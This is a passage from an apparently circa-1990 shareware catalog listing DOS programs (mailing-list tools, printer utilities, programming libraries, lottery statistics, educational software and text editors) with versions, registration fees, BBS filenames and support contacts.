Description: + FBNCAT is a disk/diskette catalog utility. The program will a + catalog of all files on disks processed with the utility. + Printed reports, labels, and powerful search commands are + included. The most important feature of the program is its + user interface. With full menu and context sensitive help + system the need for a manual is almost eliminated. + + Program: M-LABEL [***] + Version: 2.0 (08/??/90) + Registration fee: $10 + BBS filename: MLABEL.ZIP + User support: Mail or phone, newsletter + Description: + This is an add-on for R.K. West's MAILLIST (MAIL45.ZIP). You + need to be using MAILLIST to use this. It lets you completely + customize labels to be printed from your mailing lists. 1 to 4 + across, up to 100 lines per label, user-defined fields can be + added, any combination of fields on any line in the label, etc. + Useful for Rolodex cards of any continuous-feed form. + + Program: MAILLIST [***] + Version: 4.52 (08/??/90) + user defaults, miscellaneous fixes + Registration fee: $29 + BBS filename: MAILLIST.ZIP + User support: Mail or phone, newsletter + get upgrades + Description: + Easy-to-use mailing list manager for business or personal use. + Create merge files for WordPerfect, print labels (1 or 3 + cross), automatic duplicate checking, search by any field, + "sound alike" search, restore deleted records, manage up to 99 + separate lists, compare and combine two lists, password- + protection, extra fields for user coding, Quick Find feature, + pop-up notepad, and more. Registration also includes + + -- page 59 -- + + + + Multitaskers + + Program: VMiX 286 + Version: 1.55a + Registration fee: $49 + BBS filename: VMIX.ARC, VMIX.DOC + User support: disk & manual, utilities sources, Application + Programming Interface, and 80286 version supplied. CompuServe, + BBS & VOICE support; registration good for all future versions; + beta test upcoming VMiX 386. + Description: + VMiX is a multitasking and multiuser environment for IBM PC's + and (PC, XT, AT, 386AT) compatibles. Like DV, multitasking is + supported at console windows, but if you do not like windows at + your console, then use a terminal attached to you comm port. + The environment has a slight UNIX flavor in the implementation + of multitasking. There is a choice of three user interfaces: + the VMiX shell, the MSDOS shell overlayed onto the VMiX shell + (you get both sets of command), or VMiX pulldown menus. + + + Music + + Program: PIANOMAN + Version: 4.01 + Registration fee: $25 + BBS filename: PMAN40.ARC + User support: registered users get latest version on disk; + support via EASYPLEX [72241,50], MCImail [NRubenking], or U.S. + mail (Neil J. Rubenking, 86 Midcrest Way, S.F. CA 94131) + Description: + Turn your PC keyboard into an electronic piano! PIANOMAN 4.0 is + faster, smarter, and better than any previous versions. + Compiled tunes now auto-synch themselves with processor speed, + tunes load and save blazingly fast -- try it and see! Version + 4.01 is a MINOR maintenance upgrade. You don't need to download + it if you have version 4.0. Author: Neil J. Rubenking 72241,50. + For 60 sample tunes, get PMTUNE.ARC. + + -- page 60 -- + + + + Printer utilities + + Program: 4PRINT + Version: 3.10 + Registration fee: $25, site licenses available. + BBS filename: 4PRNT310.* + User support: support provided on CompuServe via EPLEX to + [76164,237]; also by phone and mail. + Description: + 4PRINT, the original HP LaserJet utility from Korenthal + Associates, prints multiple files, four 66-line pages per sheet + of paper by printing on both sides. The program has a + comprehensive set of options for formatting and operations + control. Version 3.10 supports DeskJet (w/landscape + cartridge), II-D, and A4 paper; prints very wide documents and + spreadsheets; creates IBM-sized binders; includes all necessary + soft fonts; and more! Auth: Jim Korenthal, member of ASP. + + Program: Citizen + Version: 2.0 + Registration fee: $0 + BBS filename: CITIZEN.ZIP + User support: Users may get newest version by sending in disk & + postage. Subscription to newsletter available. Mail support. + Description: + Utility for Citizen MSP printers allows the user to set type + size and font, print text files, type envelopes. + + Program: GRAB Plus with LaserLabel + Version: 5.7 + improved laser printer font handling. Can now use multiple + fonts in the addresses. + Registration fee: $49.95 + BBS filename: GRAB57.ZIP + User support: Phone, Mail and Compuserve (70040,645) + approved vendors. + Description: + GRAB Plus with LaserLabel, the Memory Resident Envelope Printer + version 5.7 is a 6K TSR! PC Magazine March 15, 1988 "I suggest + you grab a copy". and December 13, 1988 "GRAB Plus, The + Envelope Printer is a RAM-resident program that knows how + envelopes ought to look, and it can print them on virtually any + printer." IBM/PC/XT/AT and compatibles. DOS 2.0 or newer. Disk + has own installation program. Author - Paul Mayer + + -- page 61 -- + + + + Program: PrintGL [***] + Version: 1.12 (09/01/90) + Registration fee: $25 + BBS filename: PRINTGL.ZIP + User support: BBS and mail support are available to anyone. + Description: + PrintGL is a pen plotter emulator for PC printers. It prints or + displays HP-GL (HP 7475) plotfiles on Epson and NEC compatible + 9 and 24 pin printers, HP Laserjet, Deskjet, and PaintJet, IBM + 9 and 24 pin Proprinters, Quietwriters, and LaserPrinter, CGA, + EGA, VGA, EVGA, and HGC displays, and outputs bit maps and GEM + .IMG files. + + Program: PrintPlus + Version: 3.0 (07/22/90) + Registration fee: $10 + BBS filename: PRNTPLUS.ZIP + User support: Telephone support for 3 months. (or Mail Email) + Disk sent upon registration + Description: + File printing utility. Prints files with the option of saving + printer paper by skipping extra blank lines. There's three + different modes available from skipping no lines to skipping + any blanks lines beyond one to eliminating all blank lines. Can + view files, Delete files, Shows file size, change drive, path. + Shows today's files in diff.colors to spot them easier The file + st + name printed with date & time on top of 1 .pg. + + Program: Professional Printer Control + Version: 3.2 (05/18/90) + Registration fee: $19.95 + BBS filename: ZAPCODE.EXE + User support: current disk is mailed out; electronic mail + support; postal mail support; notified of any program updates, + and new products developed; If printer isn't supported, we'll + create driver FREE. + Description: + ZAPCODE Professional Printer Control - Use ZAPCODE to select + fonts, reset printer, change margins, advance the page, or + anything else your printer is capable of doing. Memory resident + or stand-alone running. Supports all types of printers: laser, + dot-matrix, ink-jet, even plotters! Drivers included for all + popular printers. Printer driver editor allows you to customize + or create your own. Will also enter printer codes inside your + word processor or spreadsheet program for you! EXCELLENT!!! + + -- page 62 -- + + + + Program: RLEPRT + Version: 1.2 (03/01/90) + Registration fee: $10 + BBS filename: RLEPRT12.ARC + User support: Support is currently offered via U.S. Mail, on CIS + at User ID listed. Future plans include dedicated BBS. + Description: + RLEPRT allows you to send High-Res RLE graphics directly to + your IBM/EPSON printer, without screen display and avoiding + ratio distortion from screen graphic displays. Also allows any + user to use RLE, even if NO graphic display in system! + + + Programming + + Program: Centiwrite Developer's Kit + Version: 1.10 (07/01/89) + Registration fee: $33.00 + BBS filename: CWDKIT55.* + User support: Registered users receive unlimited support via CIS, + GEnie, Delphi, BIX, and U.S. Mail. Free or low-cost upgrades + may also be provided (although not guaranteed), as well as + notice of upgrades. + Description: + The Centiwrite Developer's Kit includes the editor used in the + stand-alone version of Centiwrite 1.10. It's the ideal "plug- + in" editor for applications which create notes, memos, and + batch files shorter than one screen in length. Source code and/ + or versions for Turbo Pascal 4.0 and 5.0 are also available. + This version (CWDKIT55) requires Turbo Pascal 5.5. Full + documentation is included. Site licenses and customized + versions are also available. + + Program: CONVERT + Version: 1.0d (06/15/89) + Registration fee: $25 + BBS filename: CONVERT.* + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + Convert your TRS Model I/II/III/IV BASIC to GW-BASIC(A) + including block graphics! Unlike similar programs CONVERT's + translation percentage is better than 95%. Archive includes + CONVERT (1.0d), quik-doc, and more. + + -- page 63 -- + + + + Program: CVT2SB.EXE + Version: 1.20 (03/14/90) + Registration fee: $22-$28 + BBS filename: CVT-2SB.EXE + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + CVT2SB (ver 1.2) (formerly CVT2TB) converts GW-BASIC programs + to a more structured, more legible Structured (compiler) Basic + format - unpacks multi-statement lines - block all "IF" + statements - converts line number to labels - removes + unnecessary labels - indents IF and looping structures - self- + extracting LZW archive - Unique Software + + Program: EasyCASE + Version: 1.5 + Registration Fee: $85 plus $5 shipping + BBS Filename: EZCASE.ARC and EZCDOC.ARC + User support: Tel. - (206)-881-5149, 6-10pm (PST) M-F, noon-10pm + th + (PST) S+S Mail - Evergreen CASE Tools, 11025 164 Avenue N.E. + Redmond, WA 98052 CIS - [73250,1721] + Description: + EasyCASE is an easy-to-use Computer Aided Software Engineering + (CASE) tool for producing Transformation Schema, Data Flow + Diagrams (DFDs), Structure Charts, Entity Relationship Diagrams + (ERDs) and State Transition Diagrams to various structured + analysis and design methods. Print to Epson Fx/LQ, IBM, + Okidata, HP DeskJet, LaserJet & QuietJet. Plot to HPGL. Export + to dBASE III+, Windows Paint & PC Paintbrush. Currently limited + Data dictionary support. Requires IBM-PC (AT recommended), EGA, + Mouse. + + Program: PBWindows + Version: 2.0 (03/25/90) + Registration fee: $25 + BBS filename: PBWNDO.ZIP + User support: Via Compuserve and GEnie for registered users. + Contact is CIS PPN 73500,214 and GEnie, B.ERICK. Users not + members of either format will be avail via mail. + Description: + PBWindows allows popup windows with PowerBasic. These windows + provide many titles, shadows, color and border options. Also + compatible with Hercules monographic mode. Ability to Zoom and + build menus with only a call to RemoveBox to restore the + screen. + + -- page 64 -- + + + + Program: PDS*BASE + Version: 4.03 + Registration fee: 40.00 + BBS filename: PDS-A.EXE, PDS-B.EXE (2 files) + User support: Current disk is mailed along with utility disk. + Voice or written support provided for at least 1 year. + Description: + PDS*BASE Data Base Ver 4.03 - The BASIC programmers dream + allows you to define single or multi-file random access data + bases. The Defining program uses pull-down menus, pop-up help, + on-screen editing and then creates BASIC programs for you to + run YOUR data base. Self-extracting files PDS-A.EXE + (containing the software) and PDS-B.EXE (the documentation) can + be down-loaded with a protocal. Requires 512K to run. + + Program: Programmer's Productivity Pack + Version: 2.50 (08/14/90) + Registration fee: $79 + BBS filename: PPP25P.ZIP + User support: Current version mailed. Support via CompuServe + Mail, U.S. Mail, and telephone. Free tech support to + registered users. Next version also shipped to registered + users automatically. + Description: + Productivity tools for programmers. Programmer's Calculator, + Keystroke Reference Center, ASCII & Color Attribute Chart, + Keystroke Recording and Playback, Screen Capture with + filtering, Background Printing, Pop-Up DOS Shell, and more. + Swapping version keeps only 7K while resident. Programs only. + *Documentation is in PPP25D.ZIP* See reviews in PC World, + April 1990, Page 218 (by Tom Swan), and Dr. Dobb's Journal, Jan + 1990, Page 147 (by Jeff Duntemann). + + Program: PULL + Version: 5.5 (08/24/89) + Registration fee: $25-$35 + BBS filename: PULL55.ARC + User support: Supported via BBS at (214) 539-7855, 24 hours a day + and 2400 baud, and by phone at (214) 539-7855 M-F 10am-10pm CST + Description: + PULL55.ARC - TP 5.5 super multi-level pull-down menu + environment. Fully featured and configurable. Like TP. Easy + fill-in-the-blank concept. Has execute, single, and multiple + choice menus, unlimited slide-up submenus, slide-under data + entry windows, help windows, messages. Complete free-field + sequential data entry; pull-down directory. Uses QWIK55 and + WNDW55. Excellent tutorial/docs. Eagle Performance Software + + -- page 65 -- + + + + Program: PULLC + Version: 2.1 (08/01/89) + Registration fee: $29-$39 + BBS filename: PULLC21.ARC + User support: Supported via BBS at (214) 539-7855, 24 hours a day + and 2400 baud, and by phone at (214) 539-7855 M-F 10am-10pm CST + Description: + PULLC21.ARC - Super multi-level pull-down menu environment. + Fully featured and configurable. Like TC 2.0. Easy fill-in- + the-blank concept. Has execute, single, and multiple choice + menus, unlimited slide-up submenus, slide-under data entry + windows, help windows, messages. Complete free-field sequential + data entry; pull-down directory. Uses QWIKC21 and WNDWC21. + Excellent tutorial/docs. Works in TC, MSC, and QuickC. Eagle + Performance Software + + Program: QWIK + Version: 5.5 (08/24/89) + Registration fee: $25-$35 + BBS filename: QWIK55.ARC + User support: Supported via BBS at (214) 539-7855, 24 hours a day + and 2400 baud, and by phone at (214) 539-7855 M-F 10am-10pm CST + Description: + QWIK55.ARC - Turbo Pascal 5.5 unit for direct screen writing on + ALL IBMs in ANY text or column mode. Virtual screen power! + Includes self-centering, block filling routines - all with or + without attributes, view/write all video pages, cursor control, + save/restore screen blocks, scroll up/down. PS/2 detection + scheme, dual monitors, Hercules. 43 utilities optimize in + <2.7kb! Excellent docs - Eagle Performance Software + + Program: QWIKC + Version: 2.1 (07/06/89) + Registration fee: $29-$39 + BBS filename: QWIKC21.ARC + User support: Supported via BBS at (214) 539-7855, 24 hours a day + and 2400 baud, and by phone at (214) 539-7855 M-F 10am-10pm CST + Description: + QWIKC21.ARC - Turbo C, MicroSoft C, and QuickC libraries for + quick screen writing on ALL IBMs in ANY text or column mode. + Virtual screen power! Includes self-centering, block filling + routines - all with or without attributes, view/write all video + pages, cursor control, save/restore screen blocks, scroll up/ + down. PS/2 detection scheme, dual monitors, Hercules. 40 + utilities optimize in <2.7kb! Eagle Performance Software + + -- page 66 -- + + + + Program: SUPER MAKE [***] + Version: 1.0 (08/15/90) + Registration fee: + BBS filename: SUPER.ZIP + User support: Registered users recieve the latest version of the + program on disk, with shareware reminder screens removed, and a + printed manual. Also a serial number entitling the user to + unlimited technical support, discounted upgrades, etc. + Description: + SUPER MAKE(tm) is a full featured programmer's make utility + with automated make file generator, help facility, and 2 LJ + landscape print utilities. SM Editor makes SM and MS make + files, link and lib response files, PC-lint indirect and Clear+ + list files. User configurable, path control, mouse support, + pull down windows, context sensative help, more. Microsoft and + Borland compiler compatible. + + Program: TBFMT.EXE + Version: 1.91 (03/15/90) + Registration fee: $22-$28 + BBS filename: TB-FMT.EXE + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + TBFMT (v1.91) Formats Turbo Basic Source code the way you want + it. - touted in PCM Magazine * 6/88 pg 85 - 7/88 pg 92 - works + with or without line #'d source - all structures handled and + indented properly - case choices of UPPER, lower, Capital - + select case for labels, keywords, variables, sub/fn names - + fast formatting option - Unique Software + + Program: TesSeRact (Assembler Version) + Version: 1.10 (10/02/88) + Registration Fee: $25 + BBS filename: TESS-A.ARC + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + TesSeRact(TM) Version 1.10 (Assembler), a Library of routines + for Developing Ram-Resident Programs and a Proposed Standard + for Ram-Resident Program Communication. This Archive contains + the Assembler OBJ files and example programs. See other + TesSeRact files: + TESS-P.ARC -- Turbo Pascal 4.0 version of TesSeRact + TESS-5.ARC -- Turbo Pascal 5.0 version of TesSeRact + TESS-C.ARC -- Generic version of TesSeRact + TESS-D.ARC -- Documentation for TesSeRact + + -- page 67 -- + + + + Program: TesSeRact (Generic (C) Version) + Version: 1.10 (10/02/88) + Registration Fee: $25 + BBS filename: TESS-C.ARC + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + TesSeRact(TM) Version 1.10 (Generic), a Library of routines for + Developing Ram-Resident Programs and a Proposed Standard for + Ram-Resident Program Communication. This Archive contains the + Generic (C Language) Library and example programs. See other + TesSeRact files: + TESS-P.ARC -- Turbo Pascal 4.0 version of TesSeRact + TESS-5.ARC -- Turbo Pascal 5.0 version of TesSeRact + TESS-A.ARC -- Assembler version of TesSeRact + TESS-D.ARC -- Documentation for TesSeRact + + Program: TesSeRact (Turbo Pascal 4.0 Version) + Version: 1.10 (10/02/88) + Registration Fee: $25 + BBS filename: TESS-P.ARC + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + TesSeRact(TM) Version 1.10 (Generic), a Library of routines for + Developing Ram-Resident Programs and a Proposed Standard for + Ram-Resident Program Communication. This Archive contains the + Turbo Pascal 4.0 unit and example programs. See other + TesSeRact files: + TESS-5.ARC -- Turbo Pascal 5.0 version of TesSeRact + TESS-C.ARC -- Generic version of TesSeRact + TESS-A.ARC -- Assembler version of TesSeRact + TESS-D.ARC -- Documentation for TesSeRact + + -- page 68 -- + + + + Program: TesSeRact (Turbo Pascal 5.0 Version) + Version: 1.10 (10/02/88) + Registration Fee: $25 + BBS filename: TESS-5.ARC + User support: Printed Documentation, Upgrade policy, and source + code is available to registered users. Telephone support to + registered users; unregistered users get available time. Home + on CLMFOR LIB 13. + Description: + TesSeRact(TM) Version 1.10 (Generic), a Library of routines for + Developing Ram-Resident Programs and a Proposed Standard for + Ram-Resident Program Communication. This Archive contains the + Turbo Pascal 5.0 unit and example programs. See other + TesSeRact files: + TESS-P.ARC -- Turbo Pascal 4.0 version of TesSeRact + TESS-C.ARC -- Generic version of TesSeRact + TESS-A.ARC -- Assembler version of TesSeRact + TESS-D.ARC -- Documentation for TesSeRact + + Program: WNDW + Version: 5.5 (08/24/89) + Registration fee: $25-$35 + BBS filename: WNDW55.ARC + User support: Supported via BBS at (214) 539-7855, 24 hours a day + and 2400 baud, and by phone at (214) 539-7855 M-F 10am-10pm CST + Description: + Turbo Pascal 5.5 unit of multi-level virtual windows. Create, + hide, move, resize, rearrange, zoom and access smoothly. + Optional true virtual windows in RAM have phenomonal speeds - + even updates overlapped windows on screen! For all IBMs, all + text modes, all video pages. Requires QWIK55.ARC (QWIK55.TPU + included). Only 13k of code if all 69 routines used. Excellent + docs. Eagle Performance Software + + Program: WNDWC + Version: 2.1 (08/01/89) + Registration fee: $29-$39 + BBS filename: WNDWC21.ARC + User support: Supported via BBS at (214) 539-7855, 24 hours a day + and 2400 baud, and by phone at (214) 539-7855 M-F 10am-10pm CST + Description: + WNDWC21.ARC - Turbo C, MicroSoft C, QuickC multi-level virtual + windows libraries. Create, hide, move, resize, rearrange, zoom + and access smoothly. Optional true virtual windows in RAM have + phenomenal speeds - even updates overlapped windows! For all + IBMs, all text modes, all video pages. Requires QWIKC21.ARC + (QWIKC21S.LIB included). Only @ 13k of code if all 69 routines + used. Excellent docs. Eagle Performance Software + + -- page 69 -- + + + + Project management + + Program: BESTGUES + Version: 1.05 (06/09/89) + BBS filename: BESTGUES.EXE + User support: current version with printed manual on + registration, support via CompuServe Easyplex or phone; low + cost upgrades for future versions. + Description: + BESTGUES is a task planning tool designed to help you get a + better handle on time estimating. BESTGUES helps you figure out + how much time a task should take by making it easy for you to + break the task down into smaller chunks (up to 15), and + estimate minimum, typical and maximum times for each chunk. + Then BESTGUES gives you several estimates of the total time, + and the probability that the task will be complete in that + time. BESTGUES is fast, friendly and effective. + + Program: Easy Project + Version: 3.4 + Registration fee: $49.00 + BBS filename: EZPROJ.ARC + User support: Registered users receive latest version of program, + user manual, special access to our support BBS and free + technical support. + Description: + Easy Project 3.4 - An easy to use Project Management System. + Features include: critical path calculation, automatic + scheduling, Gantt charts detailing planned vs. actual progress, + context sensitive help, extensive reporting and dBASE file + compatibility. BBS support now available. Support 2000 tasks + per project. + + + Scanner software + + Program: PRO-CR(tm) + Version: 2.0 (05/01/90) + Registration fee: $42 + BBS filename: PRO-CR.EXE + User support: Current registered disk is mailed out; FREE + upgrades; Telephone support; BBS support. + Description: + PRO-CR(tm) V2.00 PROFESSIONAL OPTICAL CHARACTER RECOGNITION New + features for version 2.00: Font selection not required, + preview mode, online correction mode, supports 200 dpi (fax), + mis-recognitions flagged, supports compressed tiffs and pcx + files, CGA, EGA, VGA and HERCULES. Also includes optional + command line interface from DOS. + + -- page 70 -- + + + + Soft fonts + + Program: Deskfonts + Version: 1.1 + Registration fee: $25 + BBS filename: DJFONT.ARC + User support: Voice support, mail support. Registration good for + all future versions. + Description: + Deskfonts is a collection of soft fonts for the DeskJet + printer. This package includes a matching printer driver for + WP5.0. Contents: 10 pt Helv & Roman proportional medium, bold, + & italic; Old English 8 pt; Script 10 pt; Roman fixed width 10 + pt 10 pitch; Square fixed width 10 pt 10 pitch; a 24 pt symbol + set; a matching WP 5.0 printer driver, and documentation for + installing the printer driver. Requires 128K RAM cartridge! + ASP shareware. + + Program: TSR Download + Version: 1.9b + Registration fee: $35.00 - $75.00 + BBS filename: TSRDL2.EXE + User support: Voice, mail, & Compuserve support. Registered users + entitled to special products and services, plus low cost + upgrades. + Description: + TSR Download is a memory resident soft font manager. It pops up + in an application, downloads individual or lists of fonts, can + select a font, remembers the fonts in your printer & their RAM + requirements, & warns you when you will exceed printer RAM. It + finds your soft fonts automatically and translates them into + English! Parallel, serial, & network support. Now includes 12 + pt Roman & Helv LaserJet & DeskJet fonts! Downloads 100K bytes + in 16 sec. Sends DeskJet fonts by order of size. ASP Shareware. + + -- page 71 -- + + + + Statistics + + Program: Lotto Challenger + Version: 3.5 (08/31/90) + Registration fee: $29.50 + BBS filename: LC35.ZIP + User support: Registered users receive current version, one state + lottery data file, quarterly newsletter and a 10% discount on + all lottery books. Tech support via US mail, phone or + CompuServe. + Description: + Lotto Challenger 3.5 can be used with all Pick-5, Pick-6 and + Pick-7 lotteries. Uses statistical analysis to determine which + numbers are Hot, Cold, Overdue, etc. Automatically picks + numbers based on the results of it's analysis. Includes 60 + number systems which maximize the amount won when 3 or more of + the numbers played are picked. Check tickets for winning + combinations. Includes a history option for testing playing + strategies on previous drawings. + + Program: Lotto Prophet + Version: 2.2 (07/11/89) + Registration fee: $15.00 + BBS filename: PROP27.ARC + User support: Latest Version shipped, Tech support by phone + nd + 813-629-7720 (2 ) CIS 71251,2123 + Description: + Lotto Prophet Ver 2.7 released 11 July 89. An advanced lottery + science statistical compiler and evaluator. Over 40 additions + and improvements. Will work with over 50 U.S. and foreign + lotteries all at one time. Selectes numbers based on seven + different criterias. New skip and hit chart. Sum of digits. + Will store & check for winners. Hot numbers. graphs and trend + charts also power/due and most likely projections. Great for + group play. It's serious, it's fun, it's entertaining. + + -- page 72 -- + + + + Tutorials & Education + + Program: Aeius Gradebook [***] + Version: 2.52 (06/01/89) + Registration fee: $35 + BBS filename: AEIUS2.ARC + User support: 24 hour Phone line. Phone support to registered + users. Printed manual and update notification to registered + users. + Description: + Fast, easy-to-use computerized teachers gradebook. IBM or + compatible with 128K and floppy or hard disk. Easy pop up + menus for class selection or printing. Averages grades using + either total points or percentage methods. Prints either + individual student reports or class reports. Very flexible. + Accepts grade entry in letter or numerical format. Finds + makeup grades at the touch of a key. Also sorting, teacher's + comments, and grade statistics. Won 3 Education Mag. awards. + + Program: PC-CAI + Version: 1.00 + Registration fee: $35.00 + BBS filename: PC-CAI.ARC + User support: Receives 3 months phone support, Compuserve support + on 70721, 3145. Also gets printed, bound manual with illus- + trations, newsletter, information on upgrades, changes and + discounts on new versions. + Description: + Create computer driven tutorials on any subject. PC-CAI + authoring program lets you create tutorials without + programming. Use sound, graphics, animation, color and more. + Teach concepts, ask questions, record answers, grade results. + PC-CAI requires at least 360K of memory and a CGA compatible + monitor. Can be run on floppy or hard disk. ASP Shareware. + Upload by Author. Version 1.00. + + Program: SCHOOL-MOM + Version: 3.54 (06/20/90) + Registration fee: $25 + BBS filename: SCH-MOM.* + User support: I provide mail support to registered owners and + prospective owners. I provide update notices to registered + owners. Owner registration covers all the new versions. + Description: + I believe this is the most complete children's education + software available anywhere! It has multi-level modules for + Music, Math, English, Spelling, Art, Exam Generation, and more. + It requires color graphics, 256K RAM, and DOS version 2.0 or + higher. A mouse is optional. + + -- page 73 -- + + + + Program: TOUCH TYPE TUTOR + Version: 2.4 (05/01/90) + Registration fee: $10 + BBS filename: TTTUTOR.COM + User support: Current registered disk is mailed out; Telephone + support; BBS support. + Description: + TTT (Touch Type Tutor 2.4); Copyright 1988,89,90 David P. Gray) + offers three different modes of operation. The Teach Mode has + eight graduated lessons and adapts itself automatically to the + user's skill level. Speed Mode is designed for professional + typists and secretarial agencies to measure a typist's speed. + Game Mode is highly addictive and forces you to type faster and + faster to win ! Five skill levels. + + + Word processors + + Program: Centiwrite + Version: 1.10 (07/01/89) + Registration fee: $20.00 + BBS filename: CWRITE.* + User support: Registered users receive unlimited support via CIS, + GEnie, Delphi, BIX, and U.S. Mail. Free or low-cost upgrades + may also be provided (although not guaranteed), as well as + notice of upgrades. + Description: + Centiwrite is the ideal text editor for notes, memos, and batch + files shorter than one screen in length. Features include a no- + blink cursor, built-in encryption, timed saves, "load screen" + feature, auto-repeat of last character, and more. The program + is easy to use and difficult to crash. Full documentation is + included. Registered users receive additional utilities and a + customization program. Site licenses and customized versions + are also available. + + Program: CLICHE FINDER [***] + Version: 1.4 (08/??/90) + Registration fee: $19 + BBS filename: CLICHE.ZIP + User support: Mail or phone, newsletter + get upgrades + Description: + Check your documents for cliches, trite and overused words and + phrases. Works with any ASCII format file up to 60K. Database + of cliches included, you can add or delete items from the list. + + -- page 74 -- + + + + Program: Code to Code + Version: 2.0 (03/01/90) + Registration fee: $29 + BBS filename: CTOC20.* + User support: current disk is available, voice/answering machine + support, typeset documentation + Description: + "Code to Code" is a growing Typesetting/DTP/Word processing + utility collection. CTC will "decode" (remove delimited codes) + from Ventura/XyWrite/Typesetter, etc. files. Optionally, place + them in a separate file. The "uncoded file" can be heavily + edited, then have the codes reinserted. CTC will also auto- + matically split large unmanageable files into smaller ones. The + small files may be edited then rejoined to make one large file + again for more efficient processing. + + Program: CREATIVITY PACKAGE [***] + Version: 2.32 (08/??/90) + Registration fee: $34 + BBS filename: CREATE1.ZIP, CREATE2.ZIP, CREATE3.ZIP + User support: By mail or phone, newsletter + Description: + This is 1 of 3 disks. Each disk can stand on its own. Disk #1 + contains the entire text of Thomas A. Easton's book "Think + Thunder! And Unleash Your Creativity", a striaghtforward + explanation of how to develop and expand your creativity. The + book also introduces the idea of computer-aided brainstorming + as a means of developing better ideas. The book and software + are used by writers, inventors, teachers and others who need to + stimulate creative thinking. + + Program: GALAXY + Version: 3.0 (05/31/90) + Registration fee: $99.95 + BBS filename: GALAXY3.ZIP + User support: Registered users receive 3.5 and 5.25 disks, 200 + page manual, toll free technical support, free or low cost + updates, Microlytics WordFinder(tm) thesaurus and + SpellFinder(tm) spell checker. + Description: + GALAXY is easy to learn, easy to use, yet still delivers + powerful word processing features. Galaxy's modern interface + lets you work in up to ten windows on screen at once. Full + mouse support, style sheets, cut, copy, and paste, proportional + spacing and micro- justification, headers and footers, virtual + memory, automatic backup, and context sensitive help. Register + your copy of GALAXY and you will also receive the award winning + Microlytics SpellFinder spell checker and WordFinder thesaurus. + + -- page 75 -- + + + + Program: JEPRS + Version: 2.06 (05/18/90) + Registration fee: $30 + BBS filename: J206PROG.ZIP + User support: Current version and Laser-printed 30+ page manual + sent; Next major upgrade sent FREE! Support via US Mail and + CompuServe EMail [73567,471]. + Description: + JEPRS version 2.06 is a bibliographic database management + system. Version 2.0 has pull-down menus & pop-up dialog boxes, + context-sensitive help, searches with AND/OR/NOT logic, & + formatted output with boldface, italics, etc. Works on 320kb + computers with floppies or hard disk. Can import from MedLine + files, PaperChase, BRS/Colleague, and Current Contents on + Diskette. Can export in MedLine, comma-delimited, WordPerfect, + and Word Star formats. Includes User's Guide and Tutorial. + + Program: PC-Stylist + Version: 1.1 + Registration fee: $29.95 + BBS filename: STYLE.ARC in Compuserve PCVEN forum + User support: Telephone, Mail, FAX, ButtonNet (BBS), Compuserve + PCVEN. All support is free for one year following date of + purchase. PCVEN Compuserve support is free to everyone. + Description: + PC-Stylist checks the readability of a document. PC-Stylist + works with any word processor which produces ASCII text files. + STYLE.ARC contains all of the files on the PC-Stylist + distribution disk. You must "un-arc" the file before you can + use PC-Stylist. REQUIREMENTS: IBM PC or compatible; 128K RAM; + DOS 2.0 or higher. See STYLE.INF for more information. + + Program: PC-Type II + Version: 1.0 + Registration fee: $89.95 + BBS filename: TYPII1.ARC, TYPII2.ARC, TYPII3.ARC, TYPII4.ARC in + Compuserve PCVEN forum + User support: Telephone, Mail, FAX, ButtonNet (BBS), Compuserve + PCVEN. All support is free for one year following date of + purchase. PCVEN Compuserve support is free to everyone. + Description: + PC-Type II is ButtonWare's new word processing program. Many + new features including: easy to use menu interface, spell check + search for alternatives, import of PC-File:dB data with + improved searching, graphing, edit up to 10 different files in + up to 4 windows, math, date and time arithmetic, and much more. + + -- page 76 -- + + + + Program: pEDIT + Version: 1.65 (04/01/90) + Registration fee: $25 + BBS filename: PEDIT165.ZIP + User support: Registered users receive the latest version of + pEDIT (without opening shareware screen) and printed + documentation. Assistance and bugfixes will be provided by mail + and on Compuserve. + Description: + Full featured split screen editor with ability to edit up to 4 + files at one time. Definable keys, insert/overstrike modes, key + macros, repeat, auto-indent, horiz. scrolling, autosave, WP + features like settable margins, word wrap, center line, change + case. Recall/edit any previous command, spawn to DOS, DOS buf- + fer, 43-line mode, colors. File size limited only by memory. + Includes full documenmtation and an installation program. + + Program: QEdit Advanced + Version: 2.1 (03/01/90) + Registration fee: $58 + BBS filename: QEDIT21.ZIP + User support: Current disk, 125 page spiral bound manual, and + reference card are mailed on registration. Support available + via voice, mail, FAX, bbs, and Compuserve. Discounts on major + upgrades and future prods + Description: + "Highly recommended" by John Dvorak in PC-Magazine. Blazingly + Fast, multi-file, multi-window, compact (46k) text editor, that + is powerful, yet EASY to use. Includes macros, column blocks, + and basic word-processing features. Completely configurable, + including keyboard, colors and initial settings. New in version + 2.1 are: swap to disk/EMS on shell, CenterLine, plus much more! + 1989 Data Based Advisor readers choice as best Program/Text + Editor. See why over 15,000 users prefer QEdit! + + Program: Ravitz Editor + Version: 1.08 (07/10/90) + Registration fee: $25 + BBS filename: RAVED.ZIP + User support: BBS and mail support are available to anyone. + Description: + Ravitz Editor is a fast, powerful, mid sized, text editor. It + has integrated outlining and overviewing, area mark + manipulation (copy, fill, shift, sort, etc.), find/change, word + wrap and reflow, line drawing, multiple file handling, change + tracking, flexible user interface (function keys, mouse, + menus), and it is configurable and programmable. + + -- page 77 -- + + + + Program: Rubicon Publisher + Version: 2.0 (09/15/89) + Registration fee: $89 + BBS filename: RUBICON.* + User support: Technical enquiries from registered users will be + accepted by mail, Compuserve or telephone answering machine, + and answered via mail, Compuserve or other means. + Description: + Comprehensive desktop publisher for the IBM PC modelled on + traditional typesetting concepts, with over 120 features. + Requires Postscript or LaserJet device, comes with 2 LaserJet + font families (Trajan and Renner), and supports numerous other + LaserJet and Postscript fonts. Batch processor, controlled by + tags embedded in the input file. 100% mouse free, graphics not + needed, but ASCII word processor required. LaserJet fonts + require 1.4MB disk space. + + Program: Technical Editor + Version: 2.5 